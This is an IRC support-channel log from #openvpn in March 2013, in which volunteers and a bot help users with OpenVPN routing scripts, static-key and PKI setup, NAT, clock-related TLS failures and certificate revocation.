15:46 -!- alcuadrado [~alcuadrad@unaffiliated/alcuadrado] has joined #openvpn 15:46 < alcuadrado> good and bad news, they respect every license :D it doesn't work :( 15:49 < pekster> Well, from where I sit I'm happy there's not a license violation (I saw one provider that tried to "re-package" openvpn and obviously linked against it in their own dll, and had no notice or mention of openvpn anywayere...) 15:50 < pekster> Well, except the binaries and stuff of course, but from a usage perspective the hid all of that 15:59 < alcuadrado> yep, ffmpeg often has the same problem 15:59 < alcuadrado> I've seen it repacked many times 16:00 < pekster> It's fine to do that of course, but you need to note that openvpn is included, provide its license, and a link to download sources, plus any linking your project has done 16:01 < pekster> This project had an "openvpn.dll" file -- that's not part of the GPL openvpn release ;) 16:01 < pekster> And of course, no clue how they ended up building that 16:01 < pekster> I lost interest when the install crashed on my sandboxed XP VM I use for trying out "questionable" products. A VM revert and I stopped caring much 16:02 < pekster> s/install/program launch/ 16:07 < alcuadrado> that's one of the problems with open source licenses 16:07 < alcuadrado> it can be expensive and tiresome to enforce them 16:07 < alcuadrado> well, thanks for your help pekster 16:07 < alcuadrado> see you 16:07 -!- alcuadrado [~alcuadrad@unaffiliated/alcuadrado] has quit [Quit: This conversation is over] 16:19 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:37 -!- Orbi [~opera@109.129.18.23] has left #openvpn [] 16:43 -!- knobo` [~bohmer@174.16.9.46.customer.cdi.no] has quit [Ping timeout: 248 seconds] 16:43 -!- C-S-B [~C-S-B@craigsblackie.broker.freenet6.net] has quit [Ping timeout: 276 seconds] 16:48 -!- C-S-B [~C-S-B@86.171.238.234] has joined #openvpn 17:18 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 17:42 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 17:57 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds] 18:16 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 256 seconds] 18:41 -!- JSharpe [~JSharpe@46.23.64.90] has quit [Quit: Leaving] 18:50 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 18:54 -!- C-S-B [~C-S-B@86.171.238.234] has quit [Ping timeout: 245 seconds] 18:58 -!- C-S-B [~C-S-B@86.171.238.234] has joined #openvpn 18:58 -!- newbie|2 [~tjz@bb219-74-43-126.singnet.com.sg] has quit [Quit: quit irc] 18:58 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 18:59 -!- tjz [~tjz@unaffiliated/tjz] has quit [Client Quit] 18:59 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 19:12 -!- spacebarbarian [~spacebarb@98.110.83.136] has joined #openvpn 19:13 -!- spacebarbarian [~spacebarb@98.110.83.136] has left #openvpn [] 19:13 -!- spacebarbarian [~spacebarb@98.110.83.136] has joined #openvpn 19:25 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Ping timeout: 260 seconds] 19:35 -!- MFSOT [~garret@24.34.166.26] has joined #openvpn 19:36 -!- aaaar0n [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn 19:36 -!- aaaar0n is now known as ar0nic 19:44 < pulz_> im trying to automate an nfs mount after openvpn has connect, but --route-up and --up seems to call the script during the connect before the routes have been set, eg it doesnt work 19:45 < pulz_> is there any other values that can be used ? 19:48 -!- l1t [~l1t@cpe-70-112-112-239.austin.res.rr.com] has quit [Quit: leaving] 19:54 -!- pinion_ is now known as pinion 19:55 -!- spacebarbarian [~spacebarb@98.110.83.136] has quit [Quit: Leaving] 20:08 < pekster> pulz_: You probably want --route-up instead 20:08 < pekster> pulz_: Maybe with --route-delay too? 20:10 < pekster> You can increase the verbosity to verb 4 and you should see the exact ordering of route additions vs script calls too 20:13 < pulz_> pekster: ended up doing a "dirty" fix 2 step scripting with script exit in script1, and it works fine (--route-up) 20:15 < pekster> Ah, that works. According to the docs --route-up is supposed to occur after routes are added (assuming you're not using --route-noexec or --route-nopull.) But yea, calling itself again with a re-entry format or something works too as a poor man's fork 20:17 < pekster> [ "$1" = "re-entry" ] || "$0" re-entry "$@" & && exit 0; sleep 2; shift 1; ... 20:17 < pekster> Or something 20:20 < pulz_> i saw a couple of posts on the forum also that indicated that not everything is setup with --route-up calls the script, and it seems to be correct, i couldnt ping the remote host before the script ended 20:20 < pulz_> and then route / connections was completed 20:21 < pulz_> but the quickfix seems to work fine so im happy 20:22 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal] 20:35 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 20:38 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 20:38 -!- MFSOT [~garret@24.34.166.26] has quit [Ping timeout: 245 seconds] 21:09 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 248 seconds] 21:27 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 21:32 -!- ceda [~fredrik@c83-248-146-227.bredband.comhem.se] has joined #openvpn 21:34 < ceda> Hi. I'm running OpenVPN 2.2.1 on a Ubuntu server 12.04.01. On my MacBook Air with latest os X I'm running Tunnelblick 3.3beta21b 21:35 < ceda> I've tried to get the very simple static key configuration up and running, as detailed here: http://openvpn.net/index.php/open-source/documentation/miscellaneous/78-static-key-mini-howto.html 21:35 <@vpnHelper> Title: Static Key Mini-HOWTO (at openvpn.net) 21:35 < ceda> both server and client machines says "all is well", but I can't ping either end 21:36 < ceda> !paste 21:36 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 21:37 < pekster> ceda: Configs from both ends, plus logs at 'verb 5' will be helpful. Also note that static key has no protocol handshake, so firewalls are a potential issue that will cause traffic not to reach the other side 21:37 < pekster> !configs 21:37 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 21:37 < pekster> !logs 21:37 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 21:38 < ceda> pekster: thanks, firewalls are off, I'll see if "nobind" on client is the cause. If not, I'll continue with posting my stuff. 21:39 < pekster> That will cause the client to use a dynamically-created port instead of the 1194 default. It's a good idea on clients generaly, but shouldn't be the cause of your issue without a big warning/error in the log about binding 21:40 < pekster> To be clear, that's for sourcing, not the destination port 21:47 < ceda> ok 21:47 < ceda> and no, didn't help. Soon to paste link to gist 21:49 < ceda> https://gist.github.com/FredrikWendt/bebee1cc75a70c16c868 21:49 <@vpnHelper> Title: client side config (at gist.github.com) 21:52 < pekster> ceda: So, if you ping the peer, you should see 'W' packets printed in the log at verb 5 (these are the openvpn tunnel packets being written) 21:53 < pekster> You should see 'R' on the server correspondoing to this meaning it was received 21:53 < pekster> If you don't, the next step is to tcpdump your interface on the server and see if the tunneled (on udp 1194) packets even come in, and verify the firewall is allowing it into the server application 21:55 < ceda> pekster: uhm, it works now! :-P 21:55 < ceda> RwrW patterns on server 21:55 < pekster> You probably want to enable the 'keepalive' option too 21:56 < pekster> Otherwise statefull firewalls (like you probably have running on your client) will refuse inbound packets after the fw decides the UDP stream is "over" 21:56 < pekster> Something like 'keepalive 10 120' tends to work well 21:56 < pekster> !keepalive 21:56 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 21:56 < ceda> well, I want a multi-user solution eventually, and have default being routed through the tunnel - I just thought I'd start with a basic simple solution 21:57 < pekster> Well, PKI isn't that much trickier to set up; just a few extra files and the PKI itself. The official howto walks you through the process: 21:57 < pekster> !howto 21:57 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 21:58 < pekster> Static key mode just blasts encrypted packets to the peer; it's functionally similar to an IPSec or GRE tunnel in that sense 21:59 < ceda> pekster: I used OpenVPN with pam authentication a couple of years ago 21:59 < ceda> distribute some files, and then rely on each user to know his/her credentials 22:00 < pekster> Personally I like to keep my VPN user DB separate from my system DB; LDAP is a middle-road option where you can assign users to groups and allow connections from only users in the 'VPN Access' group, for instance 22:01 < pekster> user-pass works, although you forgo the advantage of requiring the cert so that lost/stolen/guessed credentials can't be used for access 22:01 < ceda> well, this is a virtual machine and I intended to add users that could not login 22:02 < ceda> that's an acceptable risk, with PKI a leaked set of file is all that is needed which I think is more likely to happen from what I see how my colleagues uses files 22:03 < pekster> Nope, you also need the passphrase to decrypt the private key 22:03 < ceda> ah! 22:03 < pekster> Unless you store them on-disk unencrypted (solution: don't do that) 22:03 < ceda> :-) 22:03 < pekster> So, to connect in X509 mode you both need the private key and the pw to unlock it 22:04 < pekster> It's not quite dual-factor, but it requires "something you know" (the pw) to unlock the "something you have" 22:04 < pekster> Tehnically you can also add user-pass auth on top of that so the user also needs a valid user/pass too 22:05 < ceda> yes, tunnelblick helps with all of the key unlocking/decrypting I guess 22:05 < pekster> Indeed; it'll prompt for the passphrase of the key is encrypted 22:06 < ceda> or which key are we talking about - I'm thinking of generating n "client" keys (one for each colleague) 22:06 < ceda> but that's for another day 22:06 < ceda> pekster: thanks for all your help! 22:07 < pekster> np 22:07 < ceda> just need to get the client to route default via the tunnel and I'm set for today 22:07 < pekster> !redirect 22:07 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 22:07 <@vpnHelper> http://ircpimps.org/redirect.png 22:10 < ceda> !def1 22:11 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 22:15 < ceda> !nat-linux 22:15 < ceda> took a shot :-) 22:23 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 22:23 < ceda> ah, the ! must go before -d 22:31 < pekster> !linnat 22:31 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 22:34 -!- odoacre_ is now known as odoacre 22:55 < ceda> pekster: hmm, can't get the redirect stuff to work - what should I be looking for in the client side logs when it works? 22:55 < ceda> I don't see that the client ever changes the default route 23:06 < pekster> ceda: If you're still using a static setup it won't pull directives (you need X509 for that where the handshake and protocol exchange takes place) so you need to specify the redirect-gateway directive locally 23:06 < pekster> NAT and firewall stuff still needs to happen as before on the server 23:08 -!- aaaar0n [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn 23:08 -!- aaaar0n is now known as ar0nic 23:20 < ceda> ah, and that explains everything. thanks again! :-) 23:29 -!- Webhostbudd [~Webhostbu@c-24-7-197-240.hsd1.il.comcast.net] has joined #openvpn 23:30 < Webhostbudd> any ideas why i might be getting Sun Mar 3 06:18:41 2013 TLS Error: Unroutable control packet received from [AF_INET]xxx.xxx.xxx.xxx:1194 (si=3 op=P_CONTROL_V1) 23:30 < Webhostbudd> from a client/server which were previously on 2.2 and now upgraded to 2.3 23:49 < Webhostbudd> alright, disregard the above. It seems the ssl certificates were changed out with the upgrade and don't have common names =( --- Day changed Mon Mar 04 2013 00:04 -!- dli_ [~dli@dsl-69-172-86-211.acanac.net] has quit [Remote host closed the connection] 01:56 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 02:44 -!- colo-work [~jt@78.142.138.4] has quit [Read error: Connection reset by peer] 02:54 -!- Sickness\ [~stront@unaffiliated/s-work] has quit [Read error: Operation timed out] 02:58 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 256 seconds] 02:58 -!- ade_b [~Ade@koln-5d8170b5.pool.mediaWays.net] has joined #openvpn 02:58 -!- ade_b [~Ade@koln-5d8170b5.pool.mediaWays.net] has quit [Changing host] 02:58 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 03:13 -!- krzee [nobody@64.234.228.10] has joined #openvpn 03:13 -!- krzee [nobody@64.234.228.10] has quit [Changing host] 03:13 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 03:13 -!- mode/#openvpn [+o krzee] by ChanServ 03:24 -!- zz_AsadH is now known as AsadH 03:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 04:01 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 04:02 -!- odoacre [~antonio@222.126.240.10] has quit [Remote host closed the connection] 04:06 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 04:09 -!- gardar_ [~gardar@gardar.net] has quit [Read error: Operation timed out] 04:36 -!- _ingsoc [~phillip@216.155.131.69] has joined #openvpn 04:36 -!- gardar [~gardar@gardar.net] has joined #openvpn 04:36 < _ingsoc> Is there an option to skip openvpn connection (as a daemon) if I'm not connecting to the Internet? 04:37 < _ingsoc> The reason I ask is because it sits there for a long time trying to connect when I boot if I'm not connected to the net. 04:43 < _ingsoc> :) 04:44 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 04:44 < _ingsoc> That's not a passive aggressive smiley. I just wanted to check if I'm still connected to the chat. 04:48 <@krzee> thats all your OS stuff 04:48 <@krzee> its your init script 04:49 <@krzee> you could short-circuit the script with a check 04:49 < _ingsoc> I'm on Debian Sid. 04:49 < _ingsoc> krzee: How would I do that? :/ 04:50 <@krzee> i dont have debian, cant look at the init scripts for ya 04:50 <@krzee> maybe #debian 04:50 <@krzee> over 1000 more people there too 04:51 < _ingsoc> Doesn't openvpn have an option to stop trying? 04:51 < _ingsoc> Or maybe lower the timeout? 04:51 <@krzee> sure, but it'll still try 04:51 <@krzee> your question isnt about openvpn, it is about how to not run an init script when offline 04:51 < _ingsoc> I don't mind it trying. 04:51 < _ingsoc> I just want to lower the wait. 04:52 <@krzee> if it IS online, and does not succeed in connecting or loses connection, you do not want it to continue reconnecting? 04:52 <@krzee> what wait? 04:52 <@krzee> openvpn isnt blocking anything, that is your debian init stuff 04:52 < _ingsoc> Hmm. Alright. I will go ask in Debian. 04:52 < _ingsoc> Thank you for your help! :D 04:52 <+EugeneKay> Debian's init script makes me cry 04:52 <@krzee> yw 04:53 < _ingsoc> :( 04:53 <@krzee> i never knew you were so emotionally invested in debian EugeneKay 04:53 <+EugeneKay> It's a deep-seated hatred of the OS 04:53 < _ingsoc> Help me EugeneKay! 04:53 * EugeneKay hands _ingsoc a Scientific Linux DVD 04:54 < _ingsoc> D: 04:54 * krzee hands EugeneKay a manual to hand _ingsoc as well 04:55 * EugeneKay chews on it first 04:56 -!- _ingsoc [~phillip@216.155.131.69] has left #openvpn [] 05:01 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 05:14 -!- sh_t [~sht@176.222.238.158] has quit [Ping timeout: 272 seconds] 05:18 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 05:33 -!- marksaitis [~marksaiti@62.49.62.180] has joined #openvpn 06:04 -!- MariusIT [~userit@86.120.191.55] has quit [Quit: Nettalk6 - www.ntalk.de] 06:13 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 245 seconds] 06:22 < vistas> How do I get the Windows OpenVPN Client to remember my login credentials? My username and password are complex and it is tedious to enter them each time. Settings/Advanced Settings show no option other than caching credentials, but they are checked off and don't do what I need. 06:44 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 06:45 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 06:47 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 256 seconds] 06:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:14 < dropje> vistas: http://www.personalvpn.org/auto_login_openvpn.htm this is *not* a secure way to store passwords remember that 07:14 <@vpnHelper> Title: Auto connect and autologin with OpenVPN on Windows (at www.personalvpn.org) 07:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 07:39 -!- cyberspace- [20253@ninthfloor.org] has quit [Read error: Operation timed out] 07:41 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 07:43 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:57 -!- gitsu-sa [~gtu@unaffiliated/gitsu-sa] has joined #openvpn 07:58 < gitsu-sa> i can't access to my openvpn server anymore x_x 07:58 < gitsu-sa> Mon Mar 4 15:57:02 2013 us=561336 Expected Remote Options String: 'V4,dev-type tun,link-mtu 1602,tun-mtu 1500,proto UDPv4,comp-lzo,keydir 0,cipher AES-256-CBC,auth SHA512,keysize 256,tls-auth,key-method 2,tls-server' 07:58 < gitsu-sa> i get a lot of: WRWRWRWRWRWRWRWRWRWRRWRWRWRWRWRWRWR 07:58 < gitsu-sa> WWWWWWWWMon Mar 4 15:58:02 2013 us=129795 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity) 07:59 <@ecrist> gitsu-sa: looks like someone may be blocking the openvpn connection 07:59 <@ecrist> work firewall, perhaps? 07:59 < gitsu-sa> i'm at home 07:59 < gitsu-sa> the vpn is in my net 08:02 < gitsu-sa> http://pastebin.com/raw.php?i=zW8fvUfW 08:03 < gitsu-sa> i get a TLS: Initial packet fom openvpip, sid+something 08:03 <@ecrist> can we see server and client log, please? 08:03 <@ecrist> !logs 08:03 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 08:03 < gitsu-sa> uhm, I can access to it only by openvpn x_x 08:04 <@ecrist> uhm, I can't help you without the log 08:08 < gitsu-sa> i know that my router got a restart 08:09 < gitsu-sa> but it has a static ip, i can ping it 08:11 < gitsu-sa> well i'm going to restart it 08:11 < gitsu-sa> hope that i will find them log to debug what was the problem 08:13 <@ecrist> I'm guessing something got screwed up in the reboot, like the openvpn server didn't start, or something like that 08:14 < gitsu-sa> uhm 08:14 < gitsu-sa> but i get a package from it 08:14 < gitsu-sa> "TLS: Initial packet from $openvpn_server_ip, sid=$RANDOM $RANDOM" 08:15 < gitsu-sa> VERIFY OK: depth=1, /CN=$name_of_server_crt 08:15 < gitsu-sa> and then VERIFY OK of mine crt 08:15 <@ecrist> how about you show us the logs, like I asked? 08:15 < gitsu-sa> i can show the client log now 08:16 < gitsu-sa> !logfile 08:16 <@vpnHelper> "logfile" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging or (#3) see --daemon --log and --verb in the manual (!man) for more info 08:17 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 08:18 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn 08:21 -!- gitsu-sa [~gtu@unaffiliated/gitsu-sa] has quit [Ping timeout: 252 seconds] 08:23 -!- gitsu-sa [~gtu@adsl-ull-76-36.45-151.net24.it] has joined #openvpn 08:23 -!- gitsu-sa [~gtu@adsl-ull-76-36.45-151.net24.it] has quit [Client Quit] 08:24 -!- gitsu-sa [~gtu@unaffiliated/gitsu-sa] has joined #openvpn 08:24 < gitsu-sa> http://pastebin.com/raw.php?i=5L9ACMhT 08:26 < gitsu-sa> config: http://pastebin.com/raw.php?i=BpLCYAyW 08:27 < gitsu-sa> if you can't get nothing with those client things 08:27 < gitsu-sa> i will restart the server x_x 08:34 < gitsu-sa> uhm, with the restart i solved, seems like i don't have log 08:35 < pekster> gitsu-sa: You should check the server logfile too. The client gets partway througho the TLS handshake but it then times out. Possible causes are the server rejected it for some reason, a network issue prevented successful handshake (dropped data, MTU issues, etc) 08:35 < pekster> Don't have the server log? 08:35 < gitsu-sa> http://pastebin.com/raw.php?i=rtVz2KAD 08:35 < gitsu-sa> server config 08:37 < pekster> Configs look fine. I'm wondering if something like the clock might have been off causing the server to believe the client cert was not valid or something like that 08:38 < gitsu-sa> ofc the clock was wrong 08:38 < gitsu-sa> i know that... 08:38 < gitsu-sa> it doesn't have an hardware clock 08:38 < gitsu-sa> i have a script to post-up net config 08:38 < gitsu-sa> to sync with ntp 08:38 < gitsu-sa> so this is my 'bug' 08:39 < pekster> Yup. I also run OpenVPN on some embedded hardware applications too, so clock sync is critical to verify 08:39 < gitsu-sa> any hints? x_x 08:39 < gitsu-sa> i need to save the date somewhere 08:39 < gitsu-sa> and get it at start 08:40 < pekster> Not if you have no RTC. Since OpenVPN doesn't work without net access anyway, I solve the problem by testing the clock and if it's not "recent" (my hw sets itself to something like 2001, so I just test that it's later than 2013 or w/e current year is) I bounce the ntpd service 08:41 < pekster> I continue testing every few minutes until the clock is correct, so even if ntpd crashes after boot or something that "shouldn't" happen, it still eventually gets corrected afer a few minutes 08:44 < gitsu-sa> http://packages.debian.org/wheezy/fake-hwclock 08:45 < gitsu-sa> this looks good 08:45 <@vpnHelper> Title: Debian -- Details of package fake-hwclock in wheezy (at packages.debian.org) 08:47 < gitsu-sa> it start very soon 08:52 < gitsu-sa> well, thank you pekster!!! C: 08:52 < gitsu-sa> i will never get that problem again. 08:54 < pekster> Sure. Keep in mind that solution can still drift up to the downtime between boots, so you still want to take measures to insure NTP properly sets your clock or you'll slowly vary from real-world time 08:55 < gitsu-sa> i sync the clock every day with cron 08:56 -!- AsadH is now known as zz_AsadH 09:01 <+EugeneKay> Buy hardware with a working clock. 09:24 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:25 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 09:26 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 09:30 -!- marksaitis [~marksaiti@62.49.62.180] has quit [Ping timeout: 245 seconds] 09:34 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 09:39 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 248 seconds] 09:39 -!- JSharpe [~JSharpe@46.165.210.17] has joined #openvpn --- Log closed Mon Mar 04 10:01:01 2013 --- Log opened Mon Mar 04 10:01:14 2013 10:01 -!- ecrist_ [~ecrist@token-black.secure-computing.net] has joined #openvpn 10:01 -!- Irssi: #openvpn: Total of 178 nicks [8 ops, 0 halfops, 5 voices, 165 normal] 10:01 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Read error: Operation timed out] 10:01 < dropje> poor vpnHelper 10:01 -!- Irssi: Join to #openvpn was synced in 42 secs 10:02 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 10:02 -!- mode/#openvpn [+o vpnHelper] by ChanServ 10:02 -!- ecrist [~ecrist@freebsd/contributor/openvpn.community.support.ecrist] has quit [Ping timeout: 245 seconds] 10:02 < pekster> It disappeared yesterday as well on the wrong side of a netsplit when I was using it :\ 10:06 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 10:07 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 10:07 -!- mode/#openvpn [+o vpnHelper] by ChanServ 10:09 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:15 <+EugeneKay> !factoids 10:15 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 10:15 <+EugeneKay> Bookmark, enjoy 10:16 < pekster> Yea, I copy/pasted from it during the netsplit 10:17 -!- zz_AsadH is now known as AsadH 10:20 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 10:20 < xtz> hey guys 10:20 < xtz> I have a quick question 10:21 < xtz> in /keys/index.txt I got a db with all the certs Ive created 10:21 < xtz> how can I remove someone from there (besides text editor :P) 10:23 < pekster> xtz: If you've issued a cert, you want to revoke the key, not just delete it. The index.txt is just a flat db telling you what's been issued; the cert is still valid if you remove it from the index 10:23 < pekster> s/key/cert/ 10:23 < rob0> Furthermore, you shouldn't have your PKI on the server. Ideally you'd keep it elsewhere, not on a VPN-connected machine. 10:26 -!- You're now known as ecrist 10:26 -!- mode/#openvpn [+o ecrist] by ChanServ 10:49 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 10:49 < xtz> pekster: alright, how to remove the cert then? 10:50 < xtz> I mean, the cert itself (as a file) is removed already 10:50 < xtz> is there another db thats keeping record of these? 10:51 < pekster> The index.txt is just that - an index. You need the cert file on-disk on the PKI as that's used to perform the revocation 10:51 < pekster> If you deleted it, it's somewhat non-trivial to properly revoke the certificate, so ideally you have backups of this critical part of your infrastructure 10:52 < pekster> The correct way to revoke an issued certificate with Easy-RSA is to use the 'revoke-full' script and pass the cert filename (sans extension) 10:53 < pekster> Then take the CRL and apply it to your server 10:53 < pekster> !revoke 10:53 < pekster> !factoids search revoke 10:53 <@vpnHelper> No keys matched that query. 10:53 < pekster> !crl 10:53 <@vpnHelper> "crl" is (#1) --crl-verify A CRL (certificate revocation list) is used when a particular key is compromised but when the overall PKI is still intact. The only time when it would be necessary to rebuild the entire PKI from scratch would be if the root certificate key itself was compromised. or (#2) you can make use of CRL by using the revoke-full script in easy-rsa (packaged with openvpn) that 10:53 <@vpnHelper> will create the CRL file for you. ssl-admin will also build a crl for you 10:54 < xtz> okayyyy 10:54 < xtz> thanks a lot for the info :-) 10:59 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has joined #openvpn 10:59 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has quit [Changing host] 10:59 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn 10:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 10:59 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 10:59 < vaillor> hi guys 10:59 < vaillor> i have configured my server in this way: 10:59 < vaillor> remote 87.20.100.100 10:59 < vaillor> ifconfig 10.3.0.1 255.255.255.0 10:59 < vaillor> secret key.txt 10:59 < vaillor> is it good? 11:01 < pekster> Without any form of context or your goals, I can definitively says "Maybe." 11:01 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 11:02 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:04 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 252 seconds] 11:05 -!- AsadH is now known as zz_AsadH 11:06 < rob0> I can definitively say that when using --secret you are not using a "server". :) That's p2p mode. 11:08 < vaillor> pekster, it's the sample.ovpn configuration file 11:12 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 11:12 < pekster> Assuming the key exists in the cwd, that config should technically launch. You really shouldn't use peer with an IP of 255.255.255.0, but again, it'll technically work 11:12 < pekster> If it's "good" depends on your setup and needs; no context from you means I can't help there 11:13 < vaillor> i need to connect point to point 11:13 < vaillor> my smartphone 11:13 < vaillor> to my pc 11:13 < pekster> Why are you using 255.255.255.0 as the remote PtP IP then? 11:13 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 255 seconds] 11:14 < vaillor> i don't know, i've seen my host-only intefrace virtualbox who connects my guest vm to my host 11:14 < vaillor> they are point-to-point 11:14 < vaillor> so i copied configuration 11:14 < vaillor> that is 255.255.255.0 11:16 < pekster> That's a netmask. When used as an IP it falls in the "reserved for future use" so-called "Class E" IP space thath you shouldn't be using 11:16 < pekster> So, don't use such a silly PtP address. I'm pretty sure virtualbox is assinging your VM on a virtual subnet, not a PtP interface 11:17 < vaillor> pekster, can you help me to configure better? 11:18 < pekster> Mirror the IP opposite what your other OpenVPN endpoint is using 11:18 < pekster> If the remote end does 'ifconfig 10.3.0.2 10.3.0.1' then the local one should use 'ifconfig 10.3.0.1.10.3.0.2' 11:18 < pekster> You can use any IPs you want for a PtP peering, although they are generally by convention placed in the same logical network segment you've reserved 11:21 < vaillor> pekster, so, on the server side i use 10.3.0.2 11:22 < vaillor> on the client side i use 10.3.0.1 ? 11:22 < pekster> You should reverse them. Technically you can make up "whatever IPs" you want, but it's really confusing if the ends to mirror/match each other 11:22 < vaillor> in the remoge line 11:22 < vaillor> "remote" 11:23 < vaillor> which ip do i need to use? 11:23 < pekster> That's your remote endpoint. 